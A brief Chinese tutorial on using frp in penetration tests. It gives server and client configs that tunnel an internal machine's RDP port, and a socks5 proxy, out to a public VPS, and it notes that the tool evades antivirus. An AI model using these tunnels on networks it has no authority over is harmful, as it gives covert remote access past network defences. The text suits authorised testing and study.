frp

frp,确实蛮好用的,他基本不会被杀软杀掉。而且无论是win到win,linux到linux还是win到linux的转发,它都支持。 Download;https://github.com/fatedier/frp/releases

frp分为有两个主要可执行文件,frps和frpc,对应的配置文件为frps.ini和frpc.ini。

其中frps用作服务端,在进行渗透的时候一般架设在公网VPS上,它的配置文件默认为这样

[common]
bind_port = 10067 #监听的端口

运行 frps -c frps.ini

frpc用作客户端,在进行渗透的时候一般假设在内网机器上,它的默认文件一般长这样

[common]
server_addr = 149.17.4.190 # 指定需要转发到的公网IP
server_port = 10067 # 公网VPS上所监听的端口

[socks_proxy] # 标签名,任意
type = tcp #设置转发的协议
local_ip=127.0.0.1 #填127.0.0.1就完事了
local_port=3389 #需要被转发的端口
remote_port=10068 #转发到VPS上的端口

运行 frpc -c frpc.ini

当我们在VPS上运行frps,内网机器运行frpc后,内网机器的3389端口就会被转发到公网的10068端口上,接下来我们远程链接 149.17.4.190:10068 即可连进内网机器的远程桌面了。

上面是端口映射,下面是直接走socks5代理

服务端:

[common]
bind_addr = 0.0.0.0
bind_port = 7000

# 用户密码保平安
dashboard_user = admin1
dashboard_pwd = hadaessd@@@!!@@#
# 允许客户端绑定的端口
allow_ports = 40000-50000

客户端

[common]
#remote vps addr
server_addr = your vps addr
#端口自选
server_port = 7000
tls_enable = true
pool_count = 5

[plugin_socks]
type = tcp
remote_port = 46075
plugin = socks5
plugin_user = admin
plugin_passwd = hahha@@###
use_encryption = true
use_compression = true